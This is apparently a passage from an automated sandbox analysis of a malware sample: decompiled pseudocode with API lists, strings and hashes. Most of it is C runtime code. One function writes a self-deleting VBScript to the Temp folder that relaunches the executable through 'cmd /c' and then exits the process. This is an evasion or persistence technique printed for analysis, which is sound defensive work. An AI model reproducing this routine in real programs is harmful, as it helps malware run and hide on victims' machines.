						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00437795(_t31);
							E00437795( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00437795(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00437795(_t74);
			}















                                            0x0043ed3e
                                            0x0043ed42
                                            0x0043ed4a
                                            0x0043ed53
                                            0x0043ed58
                                            0x0043ed5f
                                            0x0043ed67
                                            0x0043ed6f
                                            0x0043ed7a
                                            0x0043ed80
                                            0x0043ed81
                                            0x0043ed89
                                            0x0043ed91
                                            0x0043ed9c
                                            0x0043eda2
                                            0x0043eda6
                                            0x0043edb1
                                            0x0043edb7
                                            0x0043ed58
                                            0x0043edb8
                                            0x0043edc0
                                            0x0043edd3
                                            0x0043ede6
                                            0x0043edf4
                                            0x0043edff
                                            0x0043ee04
                                            0x0043ee0d
                                            0x0043ee15
                                            0x0043ee16
                                            0x0043ee16
                                            0x0043ee1c
                                            0x0043ee1f
                                            0x0043ee1f
                                            0x0043ee22
                                            0x0043ee29
                                            0x0043ee2b
                                            0x0043ee2f
                                            0x0043ee37
                                            0x0043ee3e
                                            0x0043ee44
                                            0x0043ee45
                                            0x0043ee45
                                            0x0043ee4c
                                            0x0043ee4e
                                            0x0043ee53
                                            0x0043ee5b
                                            0x0043ee60
                                            0x0043ee61
                                            0x0043ee61
                                            0x0043ee64
                                            0x0043ee67
                                            0x0043ee6a
                                            0x0043ee6d
                                            0x0043ee6d
                                            0x0043ee7f

                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 0043ED7A
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043DF8F
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043DFA1
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043DFB3
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043DFC5
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043DFD7
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043DFE9
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043DFFB
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043E00D
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043E01F
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043E031
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043E043
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043E055
                                              • Part of subcall function 0043DF72: _free.LIBCMT ref: 0043E067
                                            • _free.LIBCMT ref: 0043ED6F
                                              • Part of subcall function 00437795: HeapFree.KERNEL32(00000000,00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000), ref: 004377AB
                                              • Part of subcall function 00437795: GetLastError.KERNEL32(00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000,00000000), ref: 004377BD
                                            • _free.LIBCMT ref: 0043ED91
                                            • _free.LIBCMT ref: 0043EDA6
                                            • _free.LIBCMT ref: 0043EDB1
                                            • _free.LIBCMT ref: 0043EDD3
                                            • _free.LIBCMT ref: 0043EDE6
                                            • _free.LIBCMT ref: 0043EDF4
                                            • _free.LIBCMT ref: 0043EDFF
                                            • _free.LIBCMT ref: 0043EE37
                                            • _free.LIBCMT ref: 0043EE3E
                                            • _free.LIBCMT ref: 0043EE5B
                                            • _free.LIBCMT ref: 0043EE73
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID:
                                            • API String ID: 161543041-0
                                            • Opcode ID: f2ec757dc4136a3e8d00bfe7e43523fb9447facb4ad434f9e77f51d08510cb06
                                            • Instruction ID: 564cca5a7cf4333ca7d617c7b6128dcdaa1a0bf45b7810d89f2ba2ca707a723c
                                            • Opcode Fuzzy Hash: f2ec757dc4136a3e8d00bfe7e43523fb9447facb4ad434f9e77f51d08510cb06
                                            • Instruction Fuzzy Hash: C9317F715063019EEB71AA3AD845B9B73E9AF09354F14641FE488DB2D2EF39BC408718
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00408289, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00408289(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t35;
				void* _t36;
				void* _t39;
				void* _t53;
				void* _t66;
				void* _t67;
				void* _t78;
				char* _t111;

				_t78 = __ebx;
				_t35 = E00401F26();
				_t36 = E00401F2E(0x461258);
				_t39 = E0040B8A0(E00401F2E(0x461210), "exepath",  &_v716, 0x208, _t36, _t35);
				_t139 = _t39;
				if(_t39 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00406D5F(_t78,  &_v124, E00411130( &_v52, E00410EE9( &_v76), _t139), 0, _t139, L".vbs");
				E004031D1();
				E00401F97();
				E004084E3(_t78,  &_v100, E00406D5F(_t78,  &_v76, E004031DB(_t78,  &_v52, E00430F62(_t78,  &_v76, _t139, L"Temp")), 0, _t139, "\\"), _t139,  &_v124);
				E004031D1();
				E004031D1();
				E00405BA4(_t78,  &_v28);
				_t53 = E004031DB(_t78,  &_v196, L"\"\"\", 0");
				E00405B9B(E00406D5F(_t78,  &_v76, E0040846D( &_v52, E00406D5F(_t78,  &_v148, E004031DB(_t78,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t139,  &_v716), _t53), 0, _t139, "\n"));
				E004031D1();
				E004031D1();
				E004031D1();
				E004031D1();
				E004031D1();
				_t111 =  &_v28;
				E00405B92(_t78, _t111, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_push(_t111);
				_t66 = L00404090( &_v100);
				_t67 = E00401F26();
				if(E00411661(L00404090( &_v28), _t67 + _t67, _t66) != 0 && ShellExecuteW(0, L"open", L00404090( &_v100), 0x45595c, 0x45595c, 0) > 0x20) {
					ExitProcess(0);
				}
				E004031D1();
				E004031D1();
				return E004031D1();
			}






















                                            0x00408289
                                            0x0040829b
                                            0x004082a3
                                            0x004082c7
                                            0x004082d1
                                            0x004082d3
                                            0x004082de
                                            0x004082de
                                            0x00408300
                                            0x00408309
                                            0x00408311
                                            0x00408343
                                            0x0040834c
                                            0x00408354
                                            0x0040835c
                                            0x00408371
                                            0x004083b6
                                            0x004083be
                                            0x004083c6
                                            0x004083d1
                                            0x004083dc
                                            0x004083e7
                                            0x004083f1
                                            0x004083f4
                                            0x004083f9
                                            0x004083fd
                                            0x00408406
                                            0x00408424
                                            0x00408449
                                            0x00408449
                                            0x00408452
                                            0x0040845a
                                            0x0040846c

                                            APIs
                                              • Part of subcall function 0040B8A0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00461210), ref: 0040B8BC
                                              • Part of subcall function 0040B8A0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040B8D5
                                              • Part of subcall function 0040B8A0: RegCloseKey.ADVAPI32(00000000), ref: 0040B8E0
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004082DE
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,0045595C,0045595C,00000000), ref: 0040843D
                                            • ExitProcess.KERNEL32 ref: 00408449
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseExecuteExitFileModuleNameOpenProcessQueryShellValue
                                            • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\YE$exepath$open
                                            • API String ID: 2135335499-3594458413
                                            • Opcode ID: a65a0abc5ee4d67f6845e1345b089b6f277a7943fc65479364c57794f66f0595
                                            • Instruction ID: 723b8c8e32f3b091fe0b9548298cb71a3948bd8ec899bae5bc65fe4a469e863f
                                            • Opcode Fuzzy Hash: a65a0abc5ee4d67f6845e1345b089b6f277a7943fc65479364c57794f66f0595
                                            • Instruction Fuzzy Hash: 57413E31B101186ADB04FB61DC66DEE7778AF55709F10417FF506B60E2EE382E8ACA58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043E070, Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 97%
                                            			E0043E070(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E004368EF(0, 1, 0x50);
					_v8 = _t234;
					E00437795(0);
					if(_t234 != 0) {
						_t227 = E004368EF(0, 1, 4);
						_v12 = _t227;
						E00437795(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x45f188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E004368EF(0, 1, 4);
							_v16 = _t232;
							E00437795(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E00440E70(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E00440E70(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E00440E70(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E00440E70(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E00440E70(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E00440E70(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E00440E70(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E00440E70(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E00440E70(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E00440E70(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E00440E70(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E00440E70(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E00440E70(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E00440E70(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E00440E70(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E00440E70(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E00440E70(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E00440E70(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E00440E70(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E00440E70(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E00440E70(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E0043DF72(_v8);
								E00437795(_v8);
								E00437795(_v12);
								E00437795(_v16);
								goto L4;
							}
							E00437795(_t234);
							E00437795(_v12);
							L7:
							goto L4;
						}
						E00437795(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x45f188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00437795( *(_t210 + 0x88));
							E00437795( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}












































                                            0x0043e070
                                            0x0043e079
                                            0x0043e080
                                            0x0043e083
                                            0x0043e086
                                            0x0043e08f
                                            0x0043e0b1
                                            0x0043e0b5
                                            0x0043e0b8
                                            0x0043e0c2
                                            0x0043e0d5
                                            0x0043e0d9
                                            0x0043e0dc
                                            0x0043e0e6
                                            0x0043e0f8
                                            0x0043e38e
                                            0x0043e38f
                                            0x0043e391
                                            0x0043e399
                                            0x0043e39d
                                            0x0043e3a2
                                            0x0043e3ad
                                            0x0043e3b9
                                            0x0043e3c5
                                            0x0043e3d1
                                            0x0043e3d7
                                            0x0043e3db
                                            0x0043e3dd
                                            0x0043e3dd
                                            0x00000000
                                            0x0043e3db
                                            0x0043e107
                                            0x0043e10b
                                            0x0043e10e
                                            0x0043e118
                                            0x0043e12c
                                            0x0043e132
                                            0x0043e147
                                            0x0043e15b
                                            0x0043e172
                                            0x0043e18c
                                            0x0043e194
                                            0x0043e1a6
                                            0x0043e1bd
                                            0x0043e1d4
                                            0x0043e1ee
                                            0x0043e205
                                            0x0043e21c
                                            0x0043e233
                                            0x0043e24d
                                            0x0043e264
                                            0x0043e27b
                                            0x0043e292
                                            0x0043e2ac
                                            0x0043e2c3
                                            0x0043e2da
                                            0x0043e2f1
                                            0x0043e30b
                                            0x0043e327
                                            0x0043e355
                                            0x0043e368
                                            0x0043e359
                                            0x0043e35d
                                            0x0043e371
                                            0x00000000
                                            0x00000000
                                            0x0043e373
                                            0x0043e375
                                            0x0043e378
                                            0x0043e37a
                                            0x0043e37d
                                            0x0043e363
                                            0x0043e365
                                            0x0043e367
                                            0x0043e367
                                            0x0043e367
                                            0x0043e35d
                                            0x00000000
                                            0x0043e36d
                                            0x0043e32d
                                            0x0043e333
                                            0x0043e33c
                                            0x0043e345
                                            0x00000000
                                            0x0043e34a
                                            0x0043e11b
                                            0x0043e124
                                            0x0043e0ee
                                            0x00000000
                                            0x0043e0ee
                                            0x0043e0e9
                                            0x00000000
                                            0x0043e0e9
                                            0x0043e0c4
                                            0x00000000
                                            0x0043e099
                                            0x0043e099
                                            0x0043e09b
                                            0x0043e09e
                                            0x0043e3df
                                            0x0043e3df
                                            0x0043e3e7
                                            0x0043e3e9
                                            0x0043e3e9
                                            0x0043e3f1
                                            0x0043e3f6
                                            0x0043e3fa
                                            0x0043e402
                                            0x0043e40a
                                            0x0043e410
                                            0x0043e3fa
                                            0x0043e414
                                            0x0043e419
                                            0x0043e41f
                                            0x00000000
                                            0x0043e41f

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 5f293ea937b08461a435047a4dc2fdbb1c4953ac0b86d5f990cef9f983162202
                                            • Instruction ID: f67644c18a7f73ba92e9222327d7d987a9bc4f724c5fed0bb5f374f406863670
                                            • Opcode Fuzzy Hash: 5f293ea937b08461a435047a4dc2fdbb1c4953ac0b86d5f990cef9f983162202
                                            • Instruction Fuzzy Hash: F7C16472D40204BFEB20DBA9CC82FDE77F9AB09704F14456AFA05FB2C2D67499518768
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0044512A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 41%
                                            			E0044512A(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E00444E8D(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E0043DD65(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E00444DF8();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0043DCAE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x460720 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E00444BAB(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x460720 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E00444DF8();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x460720 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E004328DE(GetLastError());
											 *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0043DE77( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E00445009(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0043ADD1(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E004328DE(_t270);
							 *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x460720 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E00432914())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x460720 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E004328DE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E00444DF8();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00432901()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E00432914())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00432901()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E00432914()));
				}
			}





















































                                            0x0044514d
                                            0x00445151
                                            0x00445152
                                            0x00445152
                                            0x00445152
                                            0x00445154
                                            0x0044515a
                                            0x00445175
                                            0x0044517a
                                            0x0044517d
                                            0x0044517f
                                            0x00445181
                                            0x004451a0
                                            0x004451a7
                                            0x004451ae
                                            0x004451b1
                                            0x004451bd
                                            0x004451c0
                                            0x004451c8
                                            0x004451c9
                                            0x004451cc
                                            0x004451cc
                                            0x004451d3
                                            0x004451d5
                                            0x004451d8
                                            0x004451e0
                                            0x004451e3
                                            0x00445250
                                            0x00445251
                                            0x00445257
                                            0x00445259
                                            0x004452a2
                                            0x004452a5
                                            0x004452ae
                                            0x004452b1
                                            0x004452b4
                                            0x004452b6
                                            0x004452b6
                                            0x004452b6
                                            0x004452a7
                                            0x004452aa
                                            0x004452aa
                                            0x004452bb
                                            0x004452be
                                            0x004452ca
                                            0x004452cf
                                            0x004452db
                                            0x004452e5
                                            0x004452e9
                                            0x004452f3
                                            0x004452f6
                                            0x00445301
                                            0x00445306
                                            0x00445316
                                            0x00445319
                                            0x0044531d
                                            0x0044531e
                                            0x00445324
                                            0x00445329
                                            0x0044532c
                                            0x0044532e
                                            0x00445330
                                            0x00445335
                                            0x00445338
                                            0x0044533a
                                            0x00445364
                                            0x00445388
                                            0x0044538c
                                            0x00445390
                                            0x00445392
                                            0x00445396
                                            0x00445398
                                            0x004453a2
                                            0x004453a5
                                            0x004453ac
                                            0x004453ac
                                            0x004453ac
                                            0x004453ac
                                            0x00445396
                                            0x004453b1
                                            0x004453bd
                                            0x004453bf
                                            0x0044544a
                                            0x0044544a
                                            0x00000000
                                            0x004453c5
                                            0x004453c5
                                            0x004453c9
                                            0x00000000
                                            0x00000000
                                            0x004453ce
                                            0x004453e0
                                            0x004453e8
                                            0x004453eb
                                            0x004453ec
                                            0x004453ef
                                            0x004453f6
                                            0x004453fb
                                            0x004453fe
                                            0x00445432
                                            0x0044543c
                                            0x0044543c
                                            0x00445446
                                            0x00000000
                                            0x00445446
                                            0x00445407
                                            0x00445420
                                            0x00445427
                                            0x0044524a
                                            0x00000000
                                            0x0044524a
                                            0x004453bf
                                            0x0044533c
                                            0x00000000
                                            0x00445308
                                            0x0044530f
                                            0x00445312
                                            0x00445314
                                            0x0044533e
                                            0x00445340
                                            0x00000000
                                            0x00445346
                                            0x00000000
                                            0x00445314
                                            0x00445306
                                            0x00445261
